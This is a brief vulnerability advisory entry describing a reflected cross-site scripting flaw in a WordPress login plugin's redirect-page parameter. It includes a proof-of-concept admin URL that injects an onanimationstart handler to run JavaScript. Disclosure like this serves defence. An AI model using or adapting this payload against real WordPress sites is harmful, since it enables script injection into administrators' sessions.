EPSS
Percentile
40.2%
The plugin does not escape the redirect-page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=loginpress-optin.php&redirect-page;="+style%3Danimation-name%3Arotation%3Bdisplay%3Ablock+onanimationstart%3Dalert(/XSS/)+x